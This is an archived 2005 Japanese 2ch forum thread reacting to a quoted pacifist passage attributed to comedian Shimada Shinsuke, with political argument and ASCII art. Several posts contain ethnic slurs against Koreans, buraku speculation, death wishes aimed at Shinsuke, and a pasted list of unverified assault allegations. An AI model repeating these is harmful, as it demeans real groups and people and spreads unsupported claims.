5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

島田紳助「憲法9条を守りながら無抵抗で死んでいこう」

1 :番組の途中ですが名無しです:2005/05/05(木) 23:33:00 ID:fzOvGaMk0 ?##
武器は全部やめる。パトリオットも買わんと。来るなら来い、もういいです。
うちは最後まで平和憲法を守る。世界で類を見ない、憲法第9条を守りながら、
無抵抗で死んでいくことが、我々のメッセージだと。

憲法変えて、確立した平和憲法のもとで、平和憲法のもとで、無抵抗で戦おう。
無抵抗で死んでいこう。そうすることが一番や。今あらためて、そう、思いますね。
無抵抗な人間には大義名分は成り立たへんのやから。
北朝鮮に経済制裁なんかしたらいかん。怒りよる。大義名分が成り立ってしまうもん。
経済制裁する、日本も一緒にやる、それだけで向こうは攻める理由ができるもん。

著書「いつも心に紳助を」より

2 :番組の途中ですが名無しです:2005/05/05(木) 23:33:08 ID:I6Uu6FsX0
         ∧ ∧
        (・∀ ・)  <おしゃれなポーズ
        <(  )v
         / <

これが斉藤またんきクオリティ
http://ex10.2ch.net/test/read.cgi/news4vip/1115300687/

3 :番組の途中ですが名無しです:2005/05/05(木) 23:33:28 ID:d+B/gan+0
             ,r;;;;ミミミミミミヽ,,_
           ,i':r"      `ミ;;,
           彡        ミ;;;i やあ 
           彡 ,,,,,、 ,,,,、、 ミ;;;!    
           ,ゞi" ̄ フ‐! ̄~~|-ゞ, ようこそ、バーボンハウスへ
          ヾi `ー‐'、 ,ゝ--、' 〉;r'
           `,|  / "ii" ヽ  |ノ
  ∧、        't ー―→ )/イ            ∧_
/⌒ヽ\        ヽ、  _,/ λ、       . . //~⌒ヽ
|( ● )| i\     _,,ノ|、  ̄/// / \     /i |( ● )|
\_ノ ^i | _,,..r''''" ノ | \`', /  /  / ̄`''ー | i^ ゝ_ノ
 |_|,-''iつl/´    ヽノ| /\   / 、│     l⊂i''-,|_|
  [__|_|/〉ヽ、  / |/ );;;;/\/   'く    /〈\|_|__]
   [ニニ〉  ',  ヽ. | /⌒| /   ゚/    / 〈二二]

4 :番組の途中ですが名無しです:2005/05/05(木) 23:34:00 ID:m7GVfsCE0
で、気に入らん女は殴る、ですか

5 :番組の途中ですが名無しです:2005/05/05(木) 23:35:06 ID:rkaZWwX60
他の人を巻き込まないで独りで死んでくださいね

6 :番組の途中ですが名無しです:2005/05/05(木) 23:35:25 ID:dKJzcDsG0
       _,,:-ー''" ̄ ̄ ̄ `ヽ、
     ,r'"           `ヽ.
 __,,::r'7" ::.              ヽ_
 ゙l  |  ::              ゙) 7
  | ヽ`l ::              /ノ )
 .| ヾミ,l _;;-==ェ;、   ,,,,,,,,,,,,,,,_ ヒ-彡|
  〉"l,_l "-ー:ェェヮ;::)  f';;_-ェェ-ニ ゙レr-{   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  | ヽ"::::''   ̄´.::;i,  i `'' ̄    r';' }   | >>1久々にワロタ
 . ゙N l ::.  ....:;イ;:'  l 、     ,l,フ ノ   | こういう前フリが沢山あったのが
 . |_i"ヽ;:...:::/ ゙'''=-='''´`ヽ.  /i l"  < 昔の芸能界なんだよな今の新参は
   .| ::゙l  ::´~===' '===''` ,il" .|'".    | 昔のたけしを知らないから困る
    .{  ::| 、 :: `::=====::" , il   |     \________
   /ト、 :|. ゙l;:        ,i' ,l' ノト、
 / .| \ゝ、゙l;:      ,,/;;,ノ;r'" :| \
'"   |   `''-、`'ー--─'";;-'''"   ,|   \_

7 :番組の途中ですが名無しです:2005/05/05(木) 23:36:00 ID:0uT4d9sb0
言い訳さえあれば何でもやるクズの主張ですね

8 :http://chobikouryaku.gozaru.jp/:2005/05/05(木) 23:36:06 ID:rvCNOeY30 ?
>>2
いいなそのキャラwwwww
気に入ったwwwww

9 :番組の途中ですが名無しです:2005/05/05(木) 23:36:19 ID:6C2i5DU50
>>1
まずお前の武力行使を禁止しろよ。
アホかこいつは。

10 :番組の途中ですが名無しです:2005/05/05(木) 23:36:21 ID:YxpbeO4M0
紳介ってチョンだろ?顔からして

11 :番組の途中ですが名無しです:2005/05/05(木) 23:36:47 ID:BuOHA4E80
死ぬのが自分だけならイザ知らず
大事な人まで死なせたく無いだろう

12 :番組の途中ですが名無しです:2005/05/05(木) 23:36:50 ID:Wo836GU+0
>>4
こういう人は「自分は正しい」と思い込んでるから、
ちょっとした事ですぐキレる。

13 :番組の途中ですが名無しです:2005/05/05(木) 23:36:51 ID:7at3hUmu0
紳助が大嫌いになりました

14 :番組の途中ですが名無しです:2005/05/05(木) 23:37:41 ID:K6jnzsyR0
尖閣諸島の灯台に括りつけておけよおおおおおぉ

15 :番組の途中ですが名無しです:2005/05/05(木) 23:37:50 ID:i3DMIlRA0
周りの国に攻め込むことによって生きてきた日本には
とうてい不可能な道ですな

16 :番組の途中ですが名無しです:2005/05/05(木) 23:37:51 ID:BFIaZGh00
こいつ希に見るほどのキモイ顔しながら自分に酔ってるのが本当に辛抱できんね。テレビもこいつ出てると見ないし。

17 :番組の途中ですが名無しです:2005/05/05(木) 23:37:54 ID:3WH01hxQ0
でも、完全武器廃棄とかやったら世界的に超エポックメイキングゆえ
今後数百年、世界史の華になれるぞ。

18 :番組の途中ですが名無しです:2005/05/05(木) 23:37:55 ID:WBBOKHH00
紳助さんって本当に賢くて平和主義の人だな〜

19 :番組の途中ですが名無しです:2005/05/05(木) 23:38:29 ID:IovuXq1o0
平和ボケしすぎ

20 :番組の途中ですが名無しです:2005/05/05(木) 23:38:47 ID:y+y+7TQk0
>>17
笑いものとしてか。

21 :番組の途中ですが名無しです:2005/05/05(木) 23:39:10 ID:hWx+XRe30 ?
芸能/テレビ界は終ってる

22 :番組の途中ですが名無しです:2005/05/05(木) 23:39:23 ID:cPz1NBSk0 ?##
>>1-18
いやいや、
これって田原とか高野に洗脳されていた頃の本だろ?

違うか?

23 :番組の途中ですが名無しです:2005/05/05(木) 23:39:42 ID:3fqOzWWi0
おまえがいうな

24 :番組の途中ですが名無しです:2005/05/05(木) 23:39:48 ID:aDW00RxZ0

悪人ほど善人ぶる典型だな

25 :番組の途中ですが名無しです:2005/05/05(木) 23:40:11 ID:YxpbeO4M0
さすが統一教会系のゴールウィンのスポンサーしてただけあるな
チョン紳助よ
みんな指摘しないけど、紳助ってとんでもない不細工だろ

26 :番組の途中ですが名無しです:2005/05/05(木) 23:40:15 ID:8Bl7xuTCO
あははは、何のギャグだよこいつは。
女一人に切れて手だす奴が
他国の軍隊に無抵抗できるわけないじゃん

27 :番組の途中ですが名無しです:2005/05/05(木) 23:40:29 ID:cPz1NBSk0 ?##
たしか、著書「いつも心に紳助を」って結構前のホンダよね

28 :番組の途中ですが名無しです:2005/05/05(木) 23:40:35 ID:Msvits3E0
紳助は社民党とすごく仲良くなれそうですね。
民主党議員の応援なんて中途半端なことやめて
福島瑞穂のところへ駆けつけろ。

29 :番組の途中ですが名無しです:2005/05/05(木) 23:40:35 ID:Vd29EEht0
  平和憲法のもとで、無抵抗で戦おう。


  へ、            /´i^⌒丶
┌―OO ミ   , ・ 。 ゚  l i ┴ ┐ l
        . ;  .    Y= =丶V  _ 、、
   ∧_∧ヘ ゚ ' 人     ( 台) l6  _/ ,,  / /
  (Д`(#))) <  >;-=―丶,__、.ト     -' / /
    /⌒ ヾ)   Y  `ーミ_,)ヾ_ ⌒ヽ       ・ ・
    | |   ヽ           (_,二ノヽ
    i lヽ ヾ\          )  __ \
   (_ノ \ \\       (  ( \ \
        \ ,/⌒/⌒)    \ ヽ  \ \
         ヽ__/__/     (__)  (__)

30 :番組の途中ですが名無しです:2005/05/05(木) 23:40:36 ID:szzGrUq40 ?#
みんな釣られすぎ
これは皮肉として言ってるんだろ

31 :番組の途中ですが名無しです:2005/05/05(木) 23:40:46 ID:VPDPVfEV0
紳助の後ろにはエセインテリ左翼の上岡龍太郎がいます


32 :番組の途中ですが名無しです:2005/05/05(木) 23:40:56 ID:IBXTI+ec0
伸介=北朝鮮か

33 :番組の途中ですが名無しです:2005/05/05(木) 23:41:15 ID:7KyGtNP10
司馬遼太郎も同じようなこと言ってたな
中国に侵略されても中国人として生きていけばいいみたいな

34 :番組の途中ですが名無しです:2005/05/05(木) 23:41:17 ID:jG3qCvIHO
いやぁほんま紳助はんの話は美談やわぁ
よーゆーた!

35 :番組の途中ですが名無しです:2005/05/05(木) 23:41:24 ID:7CKbO31z0 ?##
これは逆メッセージじゃねーの?
これを読むことで「それはおかしーだろ?」って思わせて啓発するとかいう

36 :番組の途中ですが名無しです:2005/05/05(木) 23:41:36 ID:qwOCj9dn0
みなさん
芸人の言うことですから。
ネタだよネタ。

37 :|゚ノ ^∀^) ◆SayJREMONA :2005/05/05(木) 23:41:41 ID:jR6lg+0S0 ?#
さすが芸人だ。笑わせてくれる。

38 :番組の途中ですが名無しです:2005/05/05(木) 23:41:44 ID:Ge1HYWID0
紳助よ! 漏れはまだ死にたくねえんだ与!!

39 :番組の途中ですが名無しです:2005/05/05(木) 23:41:50 ID:fGir/rgh0
いつも心に紳助を(笑)

40 :番組の途中ですが名無しです:2005/05/05(木) 23:41:53 ID:d+B/gan+0
隣のニーチェが失笑しております

41 :番組の途中ですが名無しです:2005/05/05(木) 23:42:01 ID:UnhTpb4V0
トリックスター気取りやがって

42 :番組の途中ですが名無しです:2005/05/05(木) 23:42:15 ID:suXwlEhq0
女をなぐるやつはちょん

43 :番組の途中ですが名無しです:2005/05/05(木) 23:42:19 ID:E6Ab86mw0
メンヘルはいえ、女一人を閉じ込めて暴力振るったような人間が
無抵抗平和主義とは笑わせる。

44 :番組の途中ですが名無しです:2005/05/05(木) 23:42:28 ID:3fqOzWWi0
なんか思いっきり突っ込みたいわ

45 :番組の途中ですが名無しです:2005/05/05(木) 23:42:30 ID:Ge1HYWID0
これは強烈な皮肉ですな

46 :番組の途中ですが名無しです:2005/05/05(木) 23:42:31 ID:PvOZKl6u0
じゃあ、殴るなよw

47 :番組の途中ですが名無しです:2005/05/05(木) 23:42:43 ID:YEQ/6zZa0
ヒント:敗北主義

48 :番組の途中ですが名無しです:2005/05/05(木) 23:42:47 ID:q3r1oXTPO
こないだのおばちゃんとのバトルで戦いはウンザリなんだよ伸介は

49 :番組の途中ですが名無しです:2005/05/05(木) 23:43:04 ID:IA8qQf0c0
人生で殴られることより殴ることの方がおおい奴の妄言

相手に抵抗するなといってるだけだ

50 :番組の途中ですが名無しです:2005/05/05(木) 23:43:05 ID:zbh0LZhF0
こういう事を言うやつほどいざとなったら
むちゃくちゃな殺し方で相手を殺すんだよな

とりあえずサヨクって
「私だけは助けて」って事をあっさりと仲間の前でも言い放つ人種だと思う。

51 :番組の途中ですが名無しです:2005/05/05(木) 23:43:07 ID:zZR6eMbB0
>>33
言ってねえよ!

52 :番組の途中ですが名無しです:2005/05/05(木) 23:43:17 ID:JxWagZKz0
おまえだけ無抵抗で死ねやカス

53 :番組の途中ですが名無しです:2005/05/05(木) 23:43:28 ID:kp0fTN8K0 ?###
マーフィーの法則
「悪いヤツほど平和を主張する」


54 :番組の途中ですが名無しです:2005/05/05(木) 23:43:50 ID:mC1UtC+s0
つまり素手なら良いって・・・あれ?

55 :番組の途中ですが名無しです:2005/05/05(木) 23:43:56 ID:Z1wF4xBN0
ばかじゃねーのwwwwwwwwww
どうせ一番先に逃げるんだろ。

56 :番組の途中ですが名無しです:2005/05/05(木) 23:43:57 ID:ehYMd7fE0
女子は陵辱され男共は拷問され、蹂躙の限りを尽くされる
無抵抗で死ぬという綺麗ごとにはそのへんも含まれてるんだろうな?


57 :番組の途中ですが名無しです:2005/05/05(木) 23:44:13 ID:5ph05Tx90
戦争反対のために反論するものに暴力を振いそうなやつだよな

58 :番組の途中ですが名無しです:2005/05/05(木) 23:44:24 ID:WM722lP+0
良いこと言うねぇ

59 :番組の途中ですが名無しです:2005/05/05(木) 23:44:24 ID:7at3hUmu0
確かにこの本古いな。今はどう思ってるのかね
つーかまあこんなやつに平和どうこう言う資格があるのかと

60 :番組の途中ですが名無しです:2005/05/05(木) 23:44:30 ID:Msvits3E0
>>33
ええええええマジで??
日本の歴史を調べ尽くしたうえで答えがそれ?

61 :番組の途中ですが名無しです:2005/05/05(木) 23:44:33 ID:QCAq+iHU0
>>28
既にこの前の詐欺後の辻本の選挙の応援をやってる(無所属だけど)

62 :番組の途中ですが名無しです:2005/05/05(木) 23:44:37 ID:S5bzVH/d0 ?###
自分だけ死ねよ暴力男

63 :番組の途中ですが名無しです:2005/05/05(木) 23:44:58 ID:hgDKuZKj0

伸介はわかっていない。
殺されるならまだマシ。うらで支配されて、事実上植民地化されて
アパルトヘイトみたいにしたり、昔の黒人みたいに奴隷にされる方がつらいぞ。
無抵抗だと確実に虐殺されるか奴隷化される。抵抗すれば反撃してきて即死できる。
それに「無抵抗の相手には危害を加えず優しくの精神」は日本の武士道にしかないぞ?
他国なんか無抵抗者は虐殺か奴隷化だ。歴史を見ればわかる。だから歴史の勉強は必要なんだよ。
社会は勉強する意味がない。とか言ってる子供はヤバイぞ。韓国なんかに旅行に行く馬鹿の9割がそれ。

64 :番組の途中ですが名無しです:2005/05/05(木) 23:45:03 ID:/yAID9uR0
さすがアンチ自民党で関西出身の新助。
わかりやすいねえwww
京都のド貧乏の出でしたっけ??

65 :番組の途中ですが名無しです:2005/05/05(木) 23:45:08 ID:6Hy0wueG0
影では女をボコボコに殴るような奴が平和だなんだと恥を知れ
コイツが出るテレビはもう絶対見ない

66 :番組の途中ですが名無しです:2005/05/05(木) 23:45:11 ID:TaI+i2oF0
無抵抗の女を殴った上に唾を顔射した男が
「無抵抗で死んでいこう」ですか・・・
一人で死ねや〜

67 :番組の途中ですが名無しです:2005/05/05(木) 23:45:27 ID:vmKuopj+0
無抵抗な人間を殴る

68 :番組の途中ですが名無しです:2005/05/05(木) 23:45:29 ID:8/EtQJgF0
長谷川公彦(本名?通名?)

独りで死んでくれ
と、思ったが
在日の友人も一緒にして死んでくれ

69 :番組の途中ですが名無しです:2005/05/05(木) 23:45:37 ID:zZR6eMbB0
>>60
釣られるな馬鹿!
司馬遼太郎は言ってねえよ!
おまえみたいな鵜呑みにする馬鹿が一番の害悪なんだよ!
死ね!この鵜!


70 :番組の途中ですが名無しです:2005/05/05(木) 23:45:53 ID:dk1D8ug00
>>1
それには反対だ

死んでいったら意味がない
それは敗北者でしか過ぎない

敗北者は歴史の見本にはなりはしない
「やはり平和憲法は駄目だ」となるだけだ

俺たちは平和ボケをしながら成功しなくてはならない
死なないように努力をしてこそ意味がある

71 :番組の途中ですが名無しです:2005/05/05(木) 23:46:46 ID:93yag8bs0

   /⌒⌒γ⌒ 、
  /      γ   ヽ
  l       γ   ヽ
 l   i"´  ̄`^´ ̄`゛i |
 |   |          | |
 ヽ  / ,へ    ,へ ヽ./
  !、/   一   一 V
  |6|      |     .|
  ヽl   /( 、, )\ )     大義名分成立や
   |      ) 3 (   /` ;    受け取れ  
   丶        .ノ    ;:。         
    | \ ヽ、_,ノ      , ;` ;・。
   |    ー-イ         ペッ ペッ


72 :番組の途中ですが名無しです:2005/05/05(木) 23:46:55 ID:HNepfNcH0 ?##
>>33

言ってねーよ。

73 :番組の途中ですが名無しです:2005/05/05(木) 23:46:56 ID:G8NJfd4p0
>>68友人wwwwwwwwwwwwwwww

74 :( ● ´ ー ` ● ) はスバラシイ:2005/05/05(木) 23:47:09 ID:9o/6d2YF0 ?##
伸介のはともかく、そっちは前後の文脈が無いと何とも言えないべ。


75 :番組の途中ですが名無しです:2005/05/05(木) 23:47:18 ID:WM722lP+0
無抵抗な人間を殴って唾引っかけたせいで言い訳(大義名分)
が立たずに叩かれまくった紳助ならではだ。

76 :番組の途中ですが名無しです:2005/05/05(木) 23:47:24 ID:jeX/H41+0
>>33
言ってたよ

77 :番組の途中ですが名無しです:2005/05/05(木) 23:47:30 ID:BtcHkp800
森永卓郎も全く同じことTVタックルで言ってたな。


78 :番組の途中ですが名無しです:2005/05/05(木) 23:47:39 ID:IgONOXR10
自分の親が銃剣でめったざしにされても
自分の嫁がレイプされながら殺されても
自分の子供がレイプされながら殺されても
こんな事が自分の目の前で起きても無抵抗デーース

ばかじゃねーの、それで男ですか?人間ですか?
クズが。

79 :番組の途中ですが名無しです:2005/05/05(木) 23:47:43 ID:EsRaRboJ0
もうだいぶ前なんだが渋谷ハチ口で、島田はポルノ映画をつくるような
奴だ、そういう奴が選挙に出ていいのか、と車の上からマイクで叫んでいた。
ガイセン右翼だろあれ。
ガイセン右翼ってやっぱりいいひとなわけ?

80 :番組の途中ですが名無しです:2005/05/05(木) 23:47:52 ID:oK065TMr0
珍しい事言う在日だな。

81 :番組の途中ですが名無しです:2005/05/05(木) 23:47:59 ID:7eFEBmn60
何か昔、どっかのマンガで「どんな時でも暴力はいけない!」
って主張する奴が、自分の主張通す為に反論した奴をぶん殴るってのがあった。

かなり面白かったけど、リアルで多分居るよな。こういう奴


82 :番組の途中ですが名無しです:2005/05/05(木) 23:48:20 ID:Msvits3E0
>>69
鵜呑みにはしてねーよ。
馬鹿は余計だ。

83 :番組の途中ですが名無しです:2005/05/05(木) 23:48:21 ID:TaI+i2oF0
社民党の党首(瑞穂)も同じことを言っていたな。

84 :番組の途中ですが名無しです:2005/05/05(木) 23:48:53 ID:ojNNKoy/0
浅田彰インタビューの一部をコピペしました!

 浅田:こういう時代だからこそ、憲法9条というのは、グローバルな価値を持つわけです
 記者:自衛隊はいらないということですね
 浅田:その通りです。暴力で物事を解決するというのは時代遅れです
 記者:他国が攻めてきたらどうするんだ、という声もあります
 浅田:万が一他国が攻めてきたら、日本人みんなが素手で応戦すればいいんです
 記者:素手ですか
 浅田:それで日本人が全滅したっていい。崇高な理想のために民族が滅びたと思えばいいんです

85 :番組の途中ですが名無しです:2005/05/05(木) 23:49:11 ID:MyrytOct0
72 :名無しさん :2005/04/23(土) 22:08:24
@紳竜時代、客席で野次った客に暴行
A同じく、バラエティ番組でデレクターに暴行
Bスッチー事件 些細なことで難癖つけて相手を罵り泣くまで説教する
C娘鼻血事件 挨拶をしなかっただけでリンチ
D嫁殴打事件 顔面を殴打、前歯を折る
E鈴鹿事件 タイムの計測をミスした女性に暴行
Fスッチー事件2 パペポで鶴瓶が告白、またしても些細な事でブチギレ
G伊丹事件 声かけた相手を罵り警察までかけつける騒ぎをおこす
二年前「サンデー毎日」にスクープされる。
ただ単に「ハロー」と声を掛けられただけで逆上(ほとんどキチ○イ)
Hアイドル殴打事件 某アイドルにビンタ
I3年前の5月、大阪・関西テレビの「太っ腹!紳助ファン」収録中
若手芸人コンビ「麒麟」田村が紳助を「面白くない芸人」とネタにした。
怒った紳助、客の前で田村の髪の毛をつかみ殴る蹴るの暴行。
さらに楽屋に連れて行き、壁に田村の頭をぶち当てた。


86 :番組の途中ですが名無しです:2005/05/05(木) 23:49:16 ID:yYEnWabZ0
DQN珍助だけ殺されろよm9(^Д^)プギャー

87 :番組の途中ですが名無しです:2005/05/05(木) 23:49:29 ID:wH2aXGhU0
憲法9条でも自衛権は放棄してないはずだが。
憲法9条を守る=無抵抗で死ぬ、ではない。

88 :番組の途中ですが名無しです:2005/05/05(木) 23:49:36 ID:s5kyQ80Z0
皮肉だろ

89 :番組の途中ですが名無しです:2005/05/05(木) 23:49:38 ID:WBBOKHH00
なんか真剣に勘違いしてる奴っているけど、平和=無抵抗ってのは間違ってるだろ。
平和を意地するには時には衝突したり戦う事も必要だろ?

90 :番組の途中ですが名無しです:2005/05/05(木) 23:49:40 ID:FcFoEO9E0 ?#
でもコイツ、モデルガンマニアじゃなかったか?

91 :番組の途中ですが名無しです:2005/05/05(木) 23:49:55 ID:A49tScKk0
そーいや殴られた女って今何してるの?

92 :番組の途中ですが名無しです:2005/05/05(木) 23:49:57 ID:/yAID9uR0
若手コンビの麒麟に番組でちょっとからかわれただけで半殺しのボコボコにした新助

93 :トナカイ先生 ◆pYcQXX7C9M :2005/05/05(木) 23:50:06 ID:U22pltjY0
いや、その前に死にたくないから

94 :番組の途中ですが名無しです:2005/05/05(木) 23:50:09 ID:7kwskjN70
この反応は生物としての基本的な生存欲求を無視しているな



95 :番組の途中ですが名無しです:2005/05/05(木) 23:51:09 ID:gUxqVUGV0 ?###
例の傷害事件の奴か

96 :番組の途中ですが名無しです:2005/05/05(木) 23:51:12 ID:VbhilZct0
この馬鹿の書いてることを真に受ける奴いるんだろうな
自分で判断すると言うことを教えないゆとり教育マンセー

97 :番組の途中ですが名無しです:2005/05/05(木) 23:51:20 ID:szzGrUq40 ?#
紳助もこれだけ皆が反応してくれれば満足だろう

98 :番組の途中ですが名無しです:2005/05/05(木) 23:51:46 ID:8/EtQJgF0
>>64
長谷川って
部落出身者なのか?


99 :番組の途中ですが名無しです:2005/05/05(木) 23:51:50 ID:ewUvHzOO0
ふーん、ちょっとしたことでブチきれたくせに無抵抗なんてできるんかよ。
てか無抵抗主義なんて言葉はいいけどどれほどの覚悟がいるかわからんのだろな。
たとえ恋人が目の前で強姦されようが切り刻まれようが無抵抗バンザイかね。
というかみんなが平和を望んで武力を放棄すれば平和が訪れるなんていう
妄言中の妄言を信じてんのか?平和主義者が第二次世界大戦を引き起こした
なんて今や定説だし、戦争をおこさないためにも軍隊や戦争をしようとする
意思が必要だということがちょっとでも勉強すればわかりそうなもんだが。


100 :番組の途中ですが名無しです:2005/05/05(木) 23:51:54 ID:2WYhr+OL0 ?
自分ひとりだけが暴力ふりまいて助かる気だろうな。
法律や憲法無視して銃とか隠し持っているんじゃないのか?

101 :番組の途中ですが名無しです:2005/05/05(木) 23:52:04 ID:jBHlTH480
今流行りの集団自殺のおさそいですか。お断りだ!

102 :番組の途中ですが名無しです:2005/05/05(木) 23:52:17 ID:CArYZzU30
さすが無抵抗の女を
密室で殴る蹴るする奴の言葉は重いなw

軍隊、戦力を否定してる9条を守れば
自衛隊は違憲(海外では通用しない解釈改憲とか言ってるアホがいるが)

自衛なんてできないよ。

103 :番組の途中ですが名無しです:2005/05/05(木) 23:52:41 ID:zZtPQ5wg0
どんな糞本でも売れればいいし、世の中から注目され続けてさえいればいいわけで。
アホ相手にマジになる奴が一番アホ。

104 :番組の途中ですが名無しです:2005/05/05(木) 23:53:09 ID:A49tScKk0
カプ○ンって会社にこれに似たキチ○イが多いって聞いたよ


105 :番組の途中ですが名無しです:2005/05/05(木) 23:53:22 ID:5ZAhCRWa0
こいつは自分の価値観が絶対正しいと思い込んでる馬鹿。
日本人は無抵抗で死んでいこうと言いながら、自分の気に入らない奴は暴力で黙らせる。
日本を良くしたけりゃテメーが死ね!!!

106 :番組の途中ですが名無しです:2005/05/05(木) 23:53:34 ID:YxpbeO4M0
.                   ||
.  アホォ               ||        モウクンナ
         ヴォケ      ∧||∧←>>島田紳助         イッテヨシ ! 
  ∧_∧   ∧_∧      (/ ⌒ヽ      ∧_∧   ∧_∧
 ( ´∀`)  ( ´∀`)      | |   |     (´∀` )  (´∀` )
 (    )  (    )      ∪ / ノ     (    )  (    )
 | | |   | | |       | ||      | | |   | | |
 (__)_)  (__)_)     ∪∪      (_(__)  (_(__)
                    ;
                   -━━-


107 :番組の途中ですが名無しです:2005/05/05(木) 23:53:36 ID:zJ5gVctC0
平和は勝ち取ることより
それを維持し続けるほうがよっぽど難しいんです
エロい人はそれがわからんのです。

108 :番組の途中ですが名無しです:2005/05/05(木) 23:53:38 ID:EsRaRboJ0
それともガイセン右翼は島田の名前を売ってただけなの?
ヤクザに煽られるぐらいの大物ですよ、と。
そういこといつもわからないんですけど。

109 :( ● ´ ー ` ● ) はスバラシイ:2005/05/05(木) 23:53:48 ID:9o/6d2YF0 ?##
で、誰に投票すれば日本は核武装に動いてくれるの?

110 :番組の途中ですが名無しです:2005/05/05(木) 23:54:03 ID:7eFEBmn60
こいつ絶対、ろくな死に方しねーよ
周りから嫌われる&キチガイ扱いされて終わりそう

111 :番組の途中ですが名無しです:2005/05/05(木) 23:54:21 ID:BARaX6ULO
森永卓郎もそうとうお花畑だよな。TVタックルの役どころもリアル厨房あたりが吐きそうな妄言カマして三宅の爺さんに一喝されるだけだし。

112 :番組の途中ですが名無しです:2005/05/05(木) 23:54:23 ID:hgDKuZKj0
憲法9条を守ろうと言っている。
この前までサンプロ司会者
民主党
平和主義だが理由があれば女を殴り、ツバを吐く

平和主義。平和主義。いかなる理由があろうとも女性を殴ってはいけないのが平和主義。
平和主義。平和主義。

見つけた!! 平和主義=憲法9条×民主党+女性に暴力の二乗−元サンプロ司会者

答えは、  意 味 不 明 !

113 :番組の途中ですが名無しです:2005/05/05(木) 23:55:23 ID:TY4F1xRj0
こら紳助。

お前だけ、無抵抗で氏ね。
あの女マネージャーが刃物取り出したら、「ここが頚動脈です」と首の左側指差すんだぞ。

114 :番組の途中ですが名無しです:2005/05/05(木) 23:55:45 ID:WSaDzDhU0
いつも思うんだが、>>1の文のような左翼がよく言う事って、「お前ら死ね」と言ってるようなものなんじゃないの?


115 :番組の途中ですが名無しです:2005/05/05(木) 23:56:09 ID:zZtPQ5wg0
どんなに叩こうがお前らは紳助の出演してるテレビを見るだろうし、本は売れる。
要するに、紳助は勝ち組みであり、陰で叩いてる奴等は負け組みなんだよ。

116 :番組の途中ですが名無しです:2005/05/05(木) 23:56:43 ID:/a+fIhc+0
左の発言をするという条件で、例の暴行事件をおさめたんじゃないかな

117 :番組の途中ですが名無しです:2005/05/05(木) 23:56:49 ID:ufQde6Ou0
しんすけだけじゃないよ
たけしも本音からこう思ってる

118 :番組の途中ですが名無しです:2005/05/05(木) 23:57:10 ID:MyrytOct0
  /⌒⌒γ⌒ 、
   /      γ   ヽ 
   l       γ   ヽ、
  l   i"´  ̄`^´ ̄`゛i |            /  !     \
  |   |         | |           /   ,イ      ヽ
  ヽ  / へ.__, ,_ノヽ ヽ./    \\\  /  _,,,ノ !)ノリハ    i
.  !、/   一   一 V       \\\l  ,iヾ,_;:;:;ノ、ェェ : :::}  ノ ぐはぁ!
  .|6|      |     .|        \\\、.l  ,.r、_,っ、  !_,  
  ヽl   /( 、, )\  | _       ,,・_   !  rrrrrrrァi! L
   |   ヽ ヽ二フ ) /   \    , ’,∴ ・ ¨ゝ、^'ー=~''"' ;,∧入
.   丶        .ノ /ヽ  ヽ  ・∵ ’      >、__,r‐ツ.
     \ ヽ、_,ノ     \  \      /、//|    ヽ
  / _ ` ー一'´  /    {   ヽ;:;;:   /   // |//\ 〉
  (___)     /     ゝ〉 〉 〉ノ;;:: /    //   /\ /






119 :番組の途中ですが名無しです:2005/05/05(木) 23:57:33 ID:L8vO3uVm0
井上やすし?も平和大好きの暴力野郎じゃなかったっけ

120 :番組の途中ですが名無しです:2005/05/05(木) 23:57:34 ID:PKwLQjNj0
この人好きなんだけど
たまに物凄いアホな発言するからなぁ

121 :東京kiTTY:2005/05/05(木) 23:57:54 ID:5wLkYr1h0

おまえがまずしんで手本を見せろよと(@w荒

122 :番組の途中ですが名無しです:2005/05/05(木) 23:58:02 ID:GMpWNHUr0
紳助殴ってもOKってこと?

123 :番組の途中ですが名無しです:2005/05/05(木) 23:58:05 ID:62Dput1z0
>>117
うたえもん発見

124 :番組の途中ですが名無しです:2005/05/05(木) 23:58:16 ID:szzGrUq40 ?#
しかし、日本の国防意識って異常だよな
どんな危険な相手が領空や領海侵犯してきても、相手が攻撃してきて被害が出てからの反撃じゃないと
「憲法違反だ!」って騒ぎ出す奴が出て来るんだもん
以前に中国の原潜が領海侵犯した時だって普通の国だったら、
砲撃で穴空けて潜行不能にした後、拿捕するのが妥当な処置だろ

125 :番組の途中ですが名無しです:2005/05/05(木) 23:58:22 ID:GUQWHjtt0
実際に攻めてきたら、自分は若手芸人に人間バリケード作らせて鼻歌歌いながら地下の
核シェルターにでも非難しそうだな
食料減るから家族もシェルターに入れないとかしそう

126 :番組の途中ですが名無しです:2005/05/05(木) 23:58:42 ID:951mrkjt0
これは皮肉なんじゃないの?

127 :番組の途中ですが名無しです:2005/05/05(木) 23:58:53 ID:TaI+i2oF0
>>118
わろた。
仲間同士でやる分には止めない

128 :番組の途中ですが名無しです:2005/05/05(木) 23:59:13 ID:A49tScKk0
>>115
いや、自然とチャンネル回すようになった
まあにちゃんねるやってる人間なんて少ないだろうから視聴率には影響ないんだろうな


129 :番組の途中ですが名無しです:2005/05/05(木) 23:59:30 ID:jAGd6Ax90
紳助と<丶`∀´>がそっくりな件について

130 :番組の途中ですが名無しです:2005/05/05(木) 23:59:35 ID:/yAID9uR0
そういや政治に関わる芸人関係って・・・・・・・・みんな左翼臭いな。

西川きよし
青島幸男
大橋巨銭
コロムビアトップ

あと誰かいたかな?

131 :番組の途中ですが名無しです:2005/05/05(木) 23:59:39 ID:lO6i3sqj0
吉本の生意気女を殴った紳助が、また大衆迎合の調子の良い事いってるよ。
DQNな中年女の態度にさえ我慢できなかったお前は、どうせ口だけ君だろ?

132 :番組の途中ですが名無しです:2005/05/05(木) 23:59:57 ID:aZi8f3mS0
>>1 著書「いつも心に紳助を」

ワロスwww

133 :番組の途中ですが名無しです:2005/05/06(金) 00:00:00 ID:PJ9dNgpW0
このスレは>>4で終わってるな

134 :番組の途中ですが名無しです:2005/05/06(金) 00:01:50 ID:mME1Yk4L0
これ本当に書いてあったの?


>北朝鮮に経済制裁なんかしたらいかん。怒りよる。大義名分が成り立ってしまうもん。

へぇ。経済制裁されたら攻撃していいんだw
憲法九条を尊ぶこの人から見ても、戦前の日本も大義名分大有りなんだね。

135 :番組の途中ですが名無しです:2005/05/06(金) 00:02:33 ID:9d/DwHY00
ポルポトに虐殺や旧ユーゴの民族浄化、ソマリア虐殺、チェチェンでの紛争、チベット弾圧。
「無抵抗な人間には大義名分は成り立たへんのやから」?
